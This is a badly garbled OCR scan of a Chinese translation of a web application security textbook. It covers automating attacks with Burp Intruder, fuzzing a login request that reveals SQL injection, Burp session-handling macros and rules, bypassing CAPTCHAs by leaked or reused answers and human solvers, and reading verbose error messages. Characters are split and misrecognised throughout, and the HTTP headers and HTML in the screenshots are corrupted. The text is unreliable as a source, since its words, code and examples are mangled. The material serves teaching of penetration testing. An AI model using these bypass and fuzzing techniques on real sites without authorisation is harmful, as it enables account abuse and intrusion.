Referer: https: //mdsec.aet/auth/502/Mome.ashx 


Accept-Language: en-GB 

User-Agent: Nozilla/5.0 (compatible: MSIE 9.0; Windows NT €.1: WOWs4: 
Trident/§.0) 

Acerpt-Encoding: gzip, deflate 

Host: misec net 

Connection; Feep—Alive 

Cookie: Sess onTd-ONNNN00-ASHETA-—l Ae 12 -3HE AN ID 














图 14-5 ”安置 有 效 载荷 


攻击 者 可 以 配置 Intruder 使 用 “提取 Grep” 功 能 以 可 用 的 方式 截取 所 有 
这 些 信息 。 其 运作 方式 与 JAttack 的 提取 功能 类 似 一 一 只 需 指 定 想 要 提取 
的 数据 之 前 的 表达 式 ， 如 图 14-6 所 示 。 








iy, capture ied folowing hese expres sions 


Ws _| @ 








图 14-6 ”配置 “提取 Grep” 功 能 


实施 此 攻击 将 迅速 过 历 pageid 参 数 最 后 两 位 的 所 有 可 能 值 ， 并 显示 
每 个 啊 应 中 的 页 面 标题 ， 如 图 14-7 所 示 。 从 图 中 可 以 看 出 ， 一 些 啊 应 似 
平 包 含有 用 的 管理 功能 。 此 外 ， 一 些 啊 应 为 指 同 其 他 URL 的 重 定 同 ， 这 
需要 进一步 调查 。 为 此 ， 可 以 配置 Intruder 实 施 攻 击 ， 以 提取 这 些 重 定 
回 的 目标 ， 或 者 上 自动 访问 这 些 重 定 同 ， 并 显示 最 终 的 啊 应 中 的 页 面 标 


日 


je. 








<Torm merhode"poar" action’ ’ShovPage. agh<7page ide 2104s" 
autocomplete="off"><table cellspacing="10"><tr><td>Real name; </td><td><iaput 
nane="realnan” 

type="text"/></td><td>Gnbsp :</td></tr><tr><td>Vsername: </td> <td <input 

nepe- "username: " 

typee"text"/o</td><rd-enbsp 7</td></tr><tr><td>Role: </td><tde<selecr 
namer"uoerrole” styler" vidth: L§$px),"-<opcion selected="eelected" 
value*"user">User</option><option 

value=" actin’ >A@ministrator</option></s¢lect></td></tr><tr><td>Password: </td><rd> 
<input name*"passvord"” type="passvord"/></td><tdMust contain at least 8 
characters, including Letters and numbers. <¢/cco</tre<tre<td>Confirm 
password:</td><td><input name="confirmpassvord" 





图 14-7 Wea a) ERO 


Al, yn vw) 
笑 试 访问 
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6. 攻击 3: 应 用 程序 模糊 测试 

除 利用 日 志 功 能 提取 有 用 的 信息 外 ， 当 然 还 可 以 探查 应 用 程序 中 是 
否 存在 常见 的 漏洞 。 为 确保 测试 合理 ， 攻 击 者 应 该 测试 所 有 的 参数 和 请 
求 ， 从 登录 请 求 开 始 。 

为 迅速 对 前 面 的 请 求 进行 模糊 测试 ， 必 须 在 所 有 请 求 参数 中 设 定 有 
效 载荷 位 置 。 只 需 单 击 position 选 项 卡 上 的 auto 按 钮 即 可 完成 这 项 操作 ， 
如 图 14-8 所 示 。 





burp suite Professicral | t= foa] 
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T auch’ 53 HTTP a 4d 6 
“3 
À pt: text ton/ xht en 
terer: bttp th/503/D uit > roni» 
Accepr-Langqu 
er-A7eN r 1 1b MSIE } nh 1; WOWFS; 
ident/S.J t 
ent-Type ee en 1 
A pt-En 1 h 
Boot: mds : 
ntent-Leng 
necrion: Fe A 
t -ontr 
ernare-§9 mog ming h 
- 1€a 














14-8 ”配置 Burp Intruder 对 登录 请 求 进行 模糊 测试 

















和 使 用 JAttack 实 施 模糊 测试 攻击 一 样 ， 接 下 来 需要 手动 检查 结果 
表 ， 确 定 任 何 值得 深入 调查 的 反常 现象 ， 如 图 14-9 所 示 。 与 前 面 的 攻击 
中 一 样 ， 可 以 单 击 列 标 题 ， 以 各 种 方式 对 啊 应 进行 分 类 ， 从 而 迅速 确定 











有 用 的 数据 。 











cellpedding*"0"vidthe* ion" “etyle="border ~eollapwee: collapme"><tr><td></td></tre</tableo<br/> 


corm method=“post® id-“fecmwi" newe="forml” action="Default.sshx” autoceaplete="ofi"><table 
coblepacsage”.0"><te> <td> Vpesname; </td><td><ispst HPN type="text” 

values"! */></td><cd>énbap: </td></tr> <t eo <td Pasewerd:</td><to><cinpur Daes passord” types*pasaword* 
valuer""/></eds<tcs <input type- aubmit” valuer"Login” /></td></tr></tabie> </ torm <br/> <a 
Arete"heqieter ashes Regiaterd/ o> <Do><or><heoUmelesed quetatien mark after the character teing § * 
Incorrect syntax near * '.c/DAy> es orm 





图 14-9 对 一 个 请 求 进行 模糊 测试 得 到 的 结果 一 





对 测试 结果 进行 初步 分 析 可 以 得 出 结论 ， 应 用 程序 似乎 易于 受到 
SQL 注入 。 在 有 效 载荷 位 置 1 和 2 提交 一 个 单 引 号 后 ， 应 用 程序 会 返回 另 
一 个 响应 ， 其 消息 中 包含 字符 串 quotation 和 syntax。 这 种 行为 明确 表 


示 ， 需 要 进行 手动 调查 才能 确定 和 利用 其 中 的 漏洞。 


A IF 
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Y fem 可 以 右键 单 击 任何 看 似 有 用 的 结果 ， 将 啊 应 发 送 至 
Burp Repeater 工 具 。 这 个 工具 人 允许 手动 修改 请 求 ， 然 后 多 次 重新 发 
布 这 个 请 求 ， 以 测试 应 用 程序 如 何 处 理 不 同 的 有 效 载 和 荷 、 探 得 避 开 
过 滤 的 方法 或 者 实施 具体 的 攻击 。 








14.6 ”实施 自动 化 的 限制 


本 章 目 前 介绍 的 各 种 技巧 在 许多 应 用 程序 中 都 可 以 使 用 ， 而 不 会 出 
现任 何 问 题 。 但 是 ， 在 其 他 情况 下 ， 可 能 存在 各 种 导致 无 法 实施 定制 自 
动 化 攻击 的 障碍 。 

通常 ， 实 施 自 动 化 的 限制 主要 分 为 以 下 两 类 。 

口 会 话 处 理 机 制 ， 这 类 机 制 会 防御 性 地 终止 响应 意外 请 求 的 会 话 ， 
采用 因 请 求 而 异 的 反 CSRE 令 牌 之 类 的 临时 参数 值 〈 请 参阅 第 13 章 了 解 
相关 内 容 ) ， 或 涉及 多 阶段 过 程 。 

口 CAPTCHA 控 件 ， 这 类 控件 旨 在 阻止 自动 工具 访问 特定 应 用 程序 
功能 ， 如 注册 新 用 户 账 户 的 功能 。 

我 们 将 讨论 以 上 每 一 种 情形 ， 并 介绍 通过 优化 自动 工具 或 查找 应 用 
程序 的 防御 缺陷 ， 从 而 突破 实施 自动 化 的 限制 的 方法 。 


14.6.1 会 话 处 理 机 币 


许多 应 用 程序 采用 会 话 处 理 机 制 和 其 他 有 状态 功能 来 防止 自动 测 
试 。 以 下 是 一 些 可 能 会 形成 限制 的 情形 。 
口 测试 请 求 时 ， 应 用 程序 会 出 于 防御 或 其 他 目的 ， 终 止 用 于 测试 的 
会 话 ， 剩 下 的 测试 也 随 之 失效 。 
a 某 个 应 用 程序 功能 使 用 必须 随 每 个 请 求 提 供 的 不 断 变化 的 令 牌 
(例如 ， 为 防止 请 求 伪造 攻击 〉。 
口 所 测试 的 请 求 在 多 阶段 过 程 中 显示 。 只 有 在 首先 提出 一 系列 其 他 
请 求 ， 应 用 程序 进入 适当 的 状态 时 ， 访 请求 才 会 得 到 正确 处 理 。 

基本 上 ， 通 过 针对 应 用 程序 使 用 的 各 种 机 制 来 优化 自动 化 技巧 ， 通 
党 可 以 突破 这 类 妨碍 。 如 果 在 JAttack 代 人 码 中 写 入 目 己 的 测试 代码 ， 束 可 
以 直接 突破 特定 的 会 话 处 理 或 多 阶段 机 制 。 但 是 ， 这 种 方法 可 能 较为 复 
杂 ， 并 且 不 能 有 效 地 移植 到 大 型 应 用 程序 中 。 实 际 上 ， 如 采 在 处 理 每 一 
个 新 问题 时 都 需要 编写 新 的 定制 代码 ， 这 本 里 就 是 实施 自动 化 的 一 大 限 
制 ， 这 种 方法 甚至 不 如 较 慢 的 手动 技巧 。 

Burp Suite 的 会 话 处 理 文 持 

S, Burp Suite 提 供 了 一 系列 功能 ， 可 用 于 尽 可 能 轻松 地 处 理 所 
有 这 些 情形 ， 以 便于 渗透 测试 员 继 续 进 行 测试 ， 而 由 Burp 在 后 台 无 颖 处 
理 各 种 限制 。 这 些 功 能 基于 以 下 组 件 : 



































口 cookie 库 ; 

口 请 求 宏 ; 

口 会 话 处 理 规则 。 

我 们 将 简要 介绍 如 何 组 合 使 用 这 些 功能 来 元 服 实 施 自动 化 的 限制 ， 
从 而 在 上 述 各 种 情形 下 继续 进行 测试 。 有 关 详 细 的 帮助 信息 ， 请 参阅 
Burp Suite 的 在 线 文档 。 

® cookie 

Burp Suite" A Cbycookie:, FAT iB eR bias MBurpA Ay TA 
使 用 的 应 用 程序 cookie。 滩 透 测试 员 可 以 配置 Burp 上 自动 更 新 cookie 库 的 
方式 ， 还 可 以 直接 查看 和 编辑 其 内 容 ， 如 图 14-10 所 示 。 














Cookie jar viewer Fo es 
domain name edit cookie 
bc.co.uk BBC-UID c49c0d322b0ebd7 
google.co.uk NID 44=aYLikmbonECt 
ee sah —— -- remove cookie 
mdsecnet Sessionid Je7FDs120B4ADerF | ‘MOve coe 





close 





图 14-10 Burp Suitecookie 库 


就 其 本 里 而 言 ， 该 cookie 库 并 不 执行 任何 操作 ， 但 Burp 的 其 他 会 话 
处 理 支 持 组 件 需 要 用 到 它 追 踪 的 关键 值 。 
@ 请 求 安 
宏 可 用 于 执行 各 种 会 话 相 关 的 任 
9 T: 
a 提取 应 用 程序 页 面 〈 如 用 户 的 主页 ) ， 以 检查 当前 会 话 是 否 仍然 





口 执 行 登录 ， 以 获取 新 的 有 效 会 话 ; 

口 获取 令 牌 或 nonce， 以 在 其 他 请 求 中 用 作 参 数 ; 

口 在 多 阶段 过 程 中 扫描 请 求 或 对 其 进行 模糊 测试 时 ， 需 要 提前 执行 
一 些 请 求 ， 以 便于 应 用 程序 进入 将 接受 目标 请 求 的 状态 。 

使 用 浏览 器 可 以 录制 宏 。 在 定义 宏 时 ，Burp 会 显示 Burp Proxy 的 历 








史记 录 视 图 ， 从 中 可 以 选择 定义 宏 所 需 的 请 求 。 这 时 可 以 选择 以 前 提出 
的 请 求 ， 或 重新 录制 宏 并 从 该 历史 记录 中 选择 新 项 目 ， 如 图 14-11 所 
示 。 








Select Pe pry teen Na pren ireory Pat you wah fo inct in tha macro and dio “done Mote Bat to Peco A MACIO BIW USING JOur brows ar Pa 


wil Need tc ensure that pror eteecegtion is of 








PeDROTP TIT E> Meme paged /TITLe>ceTYLe type="text/css oH | feat-famiiyi Verdana, Arial, Helvetica, sane-serst, 
font-size: 1.@em,; line-height: 1.0em: tbody | font-family: Verdana, Arial, Nelwetica, sans-serif: fent-sir 
)</atyle></hemde<hedy><tabl= bgcolor=" SCOEDAN. wlLarh=* IMI a<tee<tde<tomr fanee"A 15 nln" "> Gnbsp Nose 

pagec/ fone>ye/rer<rDe ng becder="O* srce"/ ead pag” 9ideh jh" beighr=®P4” align=” ight > 0 Tab leo cram le 
borderces*i” bgeolors*t005000" bardereolore"WO00000" cellepacings*0" cel lpadding= "0" eidrhe” i004" 
StyLer*birace-collapes! Collapoe*> <tr> ctd></ cd </tr> </tapler dr/> 





<ing Sligo ahewaddle" sre*"howe. pag” abepiLeqgged im as: Administrator. <Dr>Dr><a href= Adnin. ashe *>Adeind/ a><beo ce 
Deel="TeutDecalle. ha" Your detalls</a bersa heel-"ChangePersvord «ola">Change password«/a><larca 
brete"Lo pout . asix*>Legeut</ a><be></booy> </html> 








图 14-11 在 Burp Suite 中 录制 请 求 宏 


可 以 为 宏 中 的 每 个 项 目 配置 以 下 设置 ， 如 图 14-12 所 示 : 





Configure macro item [ete] | 
POST request to https mdsec nevauth4sQ/NewUs erStep2. san 


Cookie handling 














图 14-12 ”为 宏 项 目 配置 cookie 和 参数 处 理 方式 








口 是 否 应 将 cookie 库 中 的 cookie 添 加 到 请 求 中 ; 
否 应 将 在 响应 中 收 到 的 cookie 添 加 到 cookie 库 中 ; 

口 对 于 请 求 中 的 每 个 参数 ， 是 应 使 用 预 设 值 ， 还 是 使 用 宏 内 以 前 的 
啊 应 获取 的 值 。 

在 某 些 多 阶段 过 程 以 及 应 用 程序 大 量 使 用 反 CSREF 令 牌 的 情况 下 ， 
从 宏 内 以 前 的 啊 应 获取 参数 值 的 功能 特别 有 用 。 在 定义 新 宏 时 ，Burp 会 
通过 识别 某 些 参数 ， 尝 试 自动 查找 任何 此 类 关系 ， 这 些 参 数 的 值 可 以 从 
以 前 的 啊 应 中 《表单 字段 值 、 重 定向 目标 、 链 接 中 的 查询 字符 串 ) 确 
定 。 

















会 话 处 理 规则 
用 于 定义 会 话 处 理 规则 的 工具 是 Burp Suite 的 主要 会 话 处 理 支 持 组 
件 ， 该 工具 使 用 cookie 库 和 请 求 宏 来 克服 实施 目 动 化 的 特定 限制 。 





每 个 规则 由 范围 (规则 的 应 用 范围 ) 和 操作 (规则 执行 的 操作 〉 组 
成 。 对 于 Burp 提 出 的 每 个 出 站 请 求 ， 将 确定 哪些 定义 的 规则 在 请 求 的 应 
用 范围 内 ， 并 按 顺 序 执行 所 有 规则 的 操作 。 

每 个 规则 的 范围 可 以 基于 所 处 理 的 请 求 的 以 下 任何 或 全 部 特性 进行 
定义 ， 如 图 14-13 所 示 : 





Use the combguration below to control which URLs tue ruie applies to 


© induce af URLs 


O use sute scope defined in target tad} 


© use custom sence 








图 14-13 ”配置 会 话 处 理 规则 的 范围 


口 提出 请 求 的 Burp 工 具 ; 

口 请 求 的 URL:; 

口 请 求 中 参数 的 名 称 。 

每 个 规则 可 以 执行 一 项 或 多 项 操作 ， 如 图 14-14 所 示 ， 包 括 : 


j 


Session handing ml editor 
tetit ope | 

















图 14-14 配置 会 话 处 理 规则 的 操作 














口 从 会 话 处 理 cookie 库 中 添加 cookie; 
口 设置 特定 的 cookie 或 参数 值 ; 
口 检 查 当 前 会 话 是 否 有 效 ， 并 根据 结果 执行 相应 的 子 操作 ; 
口 运行 宏 ; 
口 提 示 用 户 在 浏览 器 中 执行 会 话 恢复 。 
所 有 这 些 操作 都 可 以 进行 灵活 配置 ， 并 且 能 够 以 任意 方式 组 合 使 
用 ， 处 理 几 乎 全 部 会 话 处 理 机 制 。 利 用 运行 宏 并 根据 结果 更 新 指定 
cookie 和 参数 值 的 功能 ， 渗 透 测试 员 可 以 在 注销 后 重新 登录 应 用 程序 。 
利用 指示 在 浏览 器 中 执行 会 话 恢复 的 提示 ， 渗 透 测试 员 可 以 处 理 需 要 键 
入 物理 令 牌 中 的 数字 或 破解 CAPTCHA 拼 图 的 登录 机 制 ( 将 在 下 一 节 介 
4). 

通过 使 用 不 同 范围 和 操作 创建 多 个 规则 ， 可 以 定义 一 系列 Burp 将 应 
用 于 不 同 URL 和 参数 的 行为 。 例 如 ， 已 知 某 应 用 程序 经 常 终止 啊 应 意外 
请 求 的 会 话 ， 并 且 大 量 使 用 一 个 _ csrftoken 反 CSRE 令 牌 。 如 果 要 测试 该 
应 用 程序 ， 可 以 定义 以 下 规则 ， 如 图 14-15 所 示 。 
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图 14-15 一 组 会 话 处 理 规 则 ， 可 用 于 处 理应 用 程序 使 用 的 会 话 终 止 机 制 和 反 CSRF 


令 牌 





























口 对 于 所 有 请 求 ， 从 Burp 的 cookie 库 中 添加 cookie。 

口 对 于 指 同 应 用 程序 的 域 的 请 求 ， 验 证 应 用 程序 的 当前 会 话 是 否 仍 
处 于 活动 状态 。 如 果 是 ， 则 运行 宏 重 新 登录 到 该 应 用 程序 ， 并 使 用 生成 
的 会 话 令 牌 更 新 cookie 库 。 

口 对 于 指 问 包含 __csrftoken 参 数 的 应 用 程序 的 请 求 ， 前 先 运行 宏 来 
获取 有 效 的 _ csrftoken 值 ， 然 后 在 提出 请 求 时 使 用 该 值 。 

要 将 Burp 的 会 话 处 理 功能 应 用 于 实际 的 应 用 程序 ， 通 常 需 要 进行 复 
杂 的 配置 ， 并 且 易 于 出 错 。Burp 提 供 了 一 项 妃 踩 功能 ， 可 用 于 解决 会 话 
处 理 配 置 问 题 。 此 功能 将 显示 Burp 对 某 个 请 求 应 用 会 话 处 理 规 则 所 执行 
的 所 有 步骤 ， 以 便于 查看 Burp 到 底 如 何 更 新 和 提出 请 求 ， 并 确定 配置 是 








fiH 方式 运行 。 会 话 处 理 退 踪 功 能 如 图 14-16 所 示 。 
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图 14-16 ”Burp 的 会 话 处 理 妃 踊 功 能 ， 可 用 于 监控 和 调试 会 话 处 理 规则 








an 的 规则 和 宏 进 行 配置 和 测试 后 ， 渗 透 测 试 
员 可 以 正常 继续 手动 和 自动 测试 ， 就 好 像 测试 限制 并 不 存在 一 样 。 


14.6.2 CAPTCHA 控 


CAPTCHA 控 件 用 于 防止 攻击 者 自动 使 用 茶 些 应 用 程序 功能 。 注 册 
e a a a 
圾 Histo 

CAPTCHA Æ Completely Automated Public Turing test to tell 
Computers and Humans Apart 〈 全 自动 区 分 人 类 和 计算 机 的 图 灵 测 试 ) 的 


缩写 。 通常 ， 这 些 测 试 采用 一 个 包含 外 形 扭 曲 的 单词 的 拼图 ， 用 户 必须 
读 取 并 在 提交 表单 的 字段 中 输入 该 单词 。 此 类 拼图 还 包括 识别 特定 的 动 
物 或 植物 、 图 像 方向 等 。 

对 人 类 而 言 ， 解 决 CAPTCHA 拼 图 相当 容易 ， 但 对 计算 机 而 言 却 非 
常 困难 。 由 于 突破 这 些 控 件 会 给 垃圾 邮件 发 送 者 带 来 经 济 利益 ， 因 而 相 
关机 构 不 断 增 加 CAPTCHA 拼 图 的 难度 ， 导 致 人 类 越 来 越 难 以 读 取 这 些 
拼图 ， 如 图 14-17 所 示 。 由 于 人 类 与 计算 机 解决 CAPTCHA 拼 图 的 能 力 相 
当 ， 因 此 ， 作 为 针对 垃圾 邮件 的 一 项 防御 措施 ， 这 些 拼 图 可 能 会 逐渐 失 
效 ， 并 可 能 会 被 废弃 。 它 们 还 会 造成 当前 并 未 完全 解决 的 访问 性 问题 。 


Type tie characters you see in the picture below 

















ana. 


图 14-17 一 个 CAPTCHA 拼 图 








CAPTCHA 拼 图 可 以 通过 各 种 方式 进行 破解 ， 仪 一 部 分 拼图 适用 于 
执行 安全 测试 。 

1. 攻击 CAPTCHA 控 件 

要 了 解 如 何 避 开 CAPTCHA 控 件 ， 最 有 效 的 方法 是 了 解 此 类 拼图 如 
何 被 传送 至 用 户 ， 以 及 应 用 程序 如 何 处 理 用 户 的 答案 。 

令 人 惊奇 的 是 ， 有 大 量 CAPTCHA 控 件 以 文本 形式 向 用 户 披露 拼图 
答案 。 披 露 答案 的 形式 包括 : 

口 拼 图 图 像 通 过 URL 加 载 ， 而 拼图 答案 却 为 该 URL 的 参数 ， 或 将 图 
像 名 设置 为 CAPTCHA 答 案 ; 

口 拼 图 答案 存储 在 隐藏 表单 字段 中 ; 

口 拼 图 答案 出 现在 HTML 注 释 或 其 他 位 置 〈( 用 于 调试 目的 〉。 

在 这 些 情况 下 ， 攻 击 者 可 以 通过 脚本 攻击 轻松 获取 包含 拼图 答案 的 
响应 ， 并 在 下 一 个 攻击 请 求 中 提交 该 答案 。 
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CAPTCHA 控 件 的 一 个 更 常见 的 漏洞 在 于 ， 攻 击 者 可 以 在 某 次 手动 
解决 拼图 ， 然 后 在 多 个 请 求 中 重复 提交 其 答案 。 正 常情 况 下 ， 每 个 拼图 
应 仅 用 一 次 ， 应 用 程序 应 在 收 到 提交 的 答案 后 废弃 该 拼图 。 如 果 不 这 样 
做 ， 攻 击 者 就 可 以 一 次 性 以 正常 方式 解决 拼图 ， 然 后 使 用 其 答案 不 限 数 
量 地 自动 提出 请 求 。 
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— 
sA 

=> 注解 ”一些 应 用 程序 有 意 提 供 破 解 CAPTCHA 的 代码 路 
径 ， 以 便于 某 些 授权 自动 进程 使 用 。 通 常 ， 在 这 些 情况 下， 无 须 提 
交 相 关 参数 名 就 可 以 避 开 CAPTCHA。 


2. 自动 破解 CAPTCHA 拼 图 

理论 上 上， 计算 机 可 以 破解 大 多 数 CAPTCHA 拼 图 ;实际 上 上， 许多 主 
流 拼图 算法 都 以 这 种 方式 被 破解 。 

对 于 包含 扭曲 单词 的 标准 拼图 ， 破 解 拼 图 的 过 程 如 下 : 

(1) 删除 图 像 噪声 ; 

(2) 将 图 像 分 割 成 单个 字母 ; 

(3) 识别 每 个 部 分 包含 的 字母 。 

采用 最 新 技术 ， 计 算 机 能 够 相当 有 效 地 删除 图 像 噪声 ， 并 识别 已 被 
正确 分 割 的 字母 。 这 时 ， 将 图 像 分 割 成 字母 是 最 重要 的 挑战 ， 特 别 是 在 
字母 重 闭 并 且 高 度 扭曲 的 情况 下 。 

对 于 可 以 轻松 分 割 成 字母 的 简单 拼图 ， 可 以 使 用 某 种 自行 编写 的 代 
码 来 删除 图 像 噪声 ， 并 将 文本 传送 到 现 有 的 OCR〔 光 学 文字 识别 〉 库 中 
来 进行 识别 。 对 于 非常 难以 分 割 的 复杂 拼图 ， 各 种 研究 项 目 已 经 成 功 破 
解 了 一 些 知 名 Web 应 用 程序 的 CAPTCHA 拼 图 。 

对 于 其 他 类 型 的 拼图 ， 则 需要 针对 拼图 图 像 的 特点 采用 不 同 的 方 
法 。 例 如 ， 对 于 要 求 识别 动物 或 物体 方向 的 拼图 ， 则 需要 使 用 实时 图 像 
数据 库 ， 以 便于 在 多 个 拼图 中 重复 使 用 。 但 是 ， 如 果 这 个 数据 库 非 常 
小 ， 攻 击 者 就 可 以 通过 手动 破解 数据 库 中 的 拼图 来 达到 成 功 实 施 攻击 的 
目的 。 即 使 为 了 使 每 一 幅 重 复 使 用 的 图 像 在 计算 机 看 来 会 有 所 不 同 ， 应 
用 程序 对 图 像 应 用 了 噪声 和 其 他 扭曲 ， 但 攻击 者 通常 会 采用 模糊 图 像 散 
列 和 彩色 直方 图 比较 ， 将 给 定 拼 图 中 的 图 像 与 已 手动 破解 的 图 像 进 行 匹 
配 。 

Microsoft 失 RAsirra 拼 图 使 用 一 个 包含 数 百 万 幅 猫 和 狗 图 像 的 数据 























库 ， 这 些 图 像 来 自 现 实 世 界 中 可 领养 的 宠物 目录 。 我 们 在 下 一 节 将 讲 
到 ， 在 庞大 的 经 济 利益 的 刺激 下 ， 即 使 这 样 的 数据 库 也 可 能 会 被 攻击 者 
快速 破解 。 

值得 注意 的 是 ， 在 所 有 这 些 情况 下 ， 要 有 效 破 解 CAPTCHA 控 件 ， 
攻击 者 并 不 需要 完全 准确 地 破解 拼图 。 例 如 ， 即 使 某 个 攻击 仅 正 确 破 解 
了 10% 的 拼图 ， 但 该 攻击 仍然 能 够 非常 有 效 地 实施 自动 安全 测试 ， 或 传 
送 垃圾 邮件 〈 视 具体 情况 而 定 ) 。 通 常 ， 与 手动 攻击 相 比 ， 即 使 自动 攻 
击 需要 提交 十 倍 以 上 的 请 求 ， 后 者 实施 起 来 仍然 更 加 快捷 和 轻松 。 
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3. 使 用 人 类 破解 者 

有 时 ， 需 要 破解 大 量 CAPTCHA 拼 图 的 犯罪 分 子 会 采用 一 些 并 不 适 
用 于 执行 Web 应 用 程序 安全 测试 的 技巧 ， 如 下 所 示 。 

口 攻 击 者 可 以 使 用 某 个 貌似 善意 的 Web 站 点 诱 使 人 类 CAPTCHA 代 
理 破 解 目 标 应 用 程序 传递 的 拼图 。 通 常 ， 攻 击 者 会 利用 竞赛 奖励 或 免费 
访问 色情 内 容 来 吸引 用 户 。 用 户 填 写 注册 表单 后 ， 将 会 看 到 一 个 从 目标 
应 用 程序 实时 提取 的 CAPTCHA 拼 图 。 用 户 破 解 该 拼图 后 ， 攻 击 者 会 将 
其 提供 的 答案 提交 给 目标 应 用 程序 。 

O 攻击 者 可 以 向 发 展 中 国家 的 人 类 CAPTCHA 工 蜂 支 付费 用 ， 由 后 
人 
1 美元 。 

















14.7 小 结 


攻击 一 个 Web 应 用 程序 所 需 执行 的 绝 大 多 数 任务 必须 根据 应 用 程序 
的 行为 以 及 与 它 交互 和 控制 它 的 方法 来 确定 。 为 此 需要 经 常 进行 手动 操 
作 ， 分 别提 交 专 门 设 计 的 请 求 并 审查 应 用 程序 对 这 些 请 求 的 响应 。 

从 概念 上 讲 ， 我 们 在 本 章 中 描述 的 技巧 非常 简单 。 它 们 包括 利用 自 
动 技巧 使 上 述 定制 任务 更 加 轻松 、 快 捷 、 高 效 。 事 实 上 ， 渗 透 测试 员 可 
以 对 想 要 执行 的 任何 手动 操作 自动 化 ， 使 用 计算 机 的 处 理 能 力 与 可 靠 性 
能 攻击 目标 程序 的 漏洞 与 弱点 。 

在 某 些 情况 下 ， 在 直接 应 用 自动 化 技巧 时 ， 可 能 会 遇 到 各 种 障碍 。 
但 是 ， 多 数 情况 下 ， 这 些 障碍 都 可 以 通过 优化 自动 化 工具 或 查找 应 用 程 
序 防御 机 制 中 的 缺陷 加 以 克服 。 

虽然 概念 上 非常 简单 ， 但 有 效 使 用 自动 化 定制 攻击 仍然 需要 运用 经 
验 、 技 能 ， 并 发 挥 想象 。 有 各 种 工具 可 帮助 渗透 测试 员 实施 攻击 ， 或 者 
他 们 也 可 以 编写 自己 的 工具 。 但 任何 工具 也 替代 不 了 人 类 的 智慧 ， 思 考 
方式 的 不 同 是 真正 熟练 的 Web 应 用 程序 黑客 与 纯粹 爱好 者 之 间 的 最 大 区 
别 。 掌 握 本 书 其 他 各 章 描述 的 所 有 技巧 后 ， 读 者 应 该 回 过 头 来 温习 本 章 
的 主题 ， 练 习 如 何 将 自动 化 定制 攻击 方法 应 用 于 那些 技巧 中 。 




















欲 知 答案 ， 请 参考 http:/mdsec. net/wahh. 
e 
符 “ 触 点 ”。 
(2) 对 于 下 面 的 每 一 类 漏洞 ， 指 出 一 个 可 用 于 确定 该 漏洞 的 模糊 
测试 字符 串 : 
(a) SQL 注入 
(b) OS 命令 注入 
Cc) 路 径 遍 历 
Cd) 脚本 文件 包含 
(3) 当 对 一 个 包含 各 种 不 同 参数 的 请 求 进行 模糊 测试 时 ， 为 何 要 
在 保持 其 他 参数 不 变 的 情况 下 轮流 针对 每 一 个 参数 进行 测试 ? 
(4) 假设 在 一 个 试图 对 登录 功能 实施 亚 力 攻击 以 找到 其 他 账户 证 
书 的 自动 攻击 中 ， 无 论 提 交 的 是 有 效 证 书 还 是 无 效 证 书 ， 应 用 程序 都 返 
回 一 个 指向 相同 UREL 的 HITP 重 定向 。 在 这 种 情况 下 ， 使 用 什么 方法 探 
查 “ 触 点 ”最 为 可 靠 ? 
(5) 当 使 用 上 自动 攻击 从 应 用 程序 中 获取 数据 时 ， 想 要 的 信息 常常 
位 于 一 个 静态 字符 串 之 后 ， 渗 透 测试 员 可 以 轻易 截获 这 些 数据 。 例 如 : 





<input type="text" name="LastName" value=" 


但 是 ， 在 其 他 情况 下 友 现 事实 并 非 如 此 ， 需 要 的 信息 之 前 的 数据 可 
能 会 发 生变 化 。 这 时 该 如 何 设计 一 个 自动 攻击 来 满足 需要 ? 
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各 种 技巧 ， 包 括 以 大 体 上 不 会 对 应 用 程序 造成 危害 的 方法 与 其 交互 ， 将 
应 用 程序 的 内 容 与 功能 进行 分 类 ， 判 定 它 使 用 的 技术 并 确定 主要 的 攻击 


本 章 介 绍 如 何在 实际 攻击 的 应 用 程序 中 提取 出 更 多 信息 ， 主 要 包括 
以 出 人 意料 和 了 恶 意 的 方式 与 应 用 程序 进行 交互 ， 利 用 应 用 程序 的 反常 行 
为 提取 出 有 价值 的 信息 。 如 采取 得 成 功 ， 攻 击 者 就 可 以 通过 这 种 攻击 获 
取 用 户 证 书 之 类 的 敏感 数据 ， 深 入 了 解 某 种 错误 条 件 并 据 此 调整 攻击 方 
TE wal 程序 所 使 用 技术 的 更 多 细节 ， 同 时 解析 应 用 程序 的 内 
部 结 SL 能 。 











15.1 AHIR 
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披露 错误 类 型 的 简单 内 置 消息 到 泄露 许多 应 用 程序 状态 细 市 的 详细 调试 
fa SAR a ea SH 

FET ZH, AE BUM ARE ASS SAAT APE MGA GA, X 
种 测试 能 够 友 现 在 正常 使 用 应 用 程序 过 程 中 出 现 的 大 部 分 错误 条 件 。 因 
此 ， 一般 情 况 下 ， 应 用 程序 会 对 这 些 条 件 进 行 合理 地 处 理 ， 而 不 会 癌 用 
户 返 回 任 何 技术 消 奶 。 但 是 ， 如 果 应 用 程序 正在 但 受 攻击 ， 很 可 能 束 会 
出 现 各 种 各 样 的 错误 条 件 ， 导 致 应 用 程序 占用 户 返 回 更 加 详细 的 信息 。 
如 打出 现 极 不 平和 的 错误 条 件 ， 即 使 是 最 注重 安全 的 应 用 程序 《如 电子 
银行 使 用 的 应 用 程序 ) ， 也 会 癌 用 户 返 回 非 常 详细 的 调试 消息 。 














如 果 在 解释 型 Web 脚 本 语言 《如 VBScript) 中 出 现 错误 ， 应 用 程序 
通常 会 返回 一 条 简单 的 错误 消息 ， 以 揭示 错误 的 本 质 ， 并 且 还 可 能 会 有 
发 生 错 误 的 文件 的 行 号 。 例 如 : 

Microsoft VBScript runtime error 800a0009 
Subscript out of range: [number -1] 
/register.asp, line 821 

这 种 消息 中 并 不 包含 任何 与 应 用 程序 状态 或 被 处 理 的 数据 有 关 的 敏 
感 信 息 。 但 是 ， 渗 透 测试 员 可 以 利用 它 从 各 方面 缩小 攻击 范围 。 例 如 ， 
当 为 探查 常见 的 漏洞 在 一 个 特殊 的 参数 中 插入 各 种 攻击 字符 串 时 ， 可 能 
会 遇 到 以 下 消息 : 

Microsoft VBScript runtime error '800a000d' 
Type mismatch: ' [string: tta]: 
/scripts/confirmOrder.asp, line 715 

这 条 消息 指出 ， 修 改 的 值 被 赋 给 了 一 个 数字 式 参数 ， 但 是 ， 由 于 提 
交 的 输入 中 包 售 非 数 字 字 符 ， 因 而 不 能 赋 给 上 述 参数 。 在 这 种 情况 下 ， 
问 这 个 参数 提供 非 数字 攻击 字符 串 可 能 达 不 到 任何 目的 ， 也 不 会 及 现 各 
种 类 型 的 漏洞 ， 因 此 ， 最 好 选择 其 他 的 参数 。 
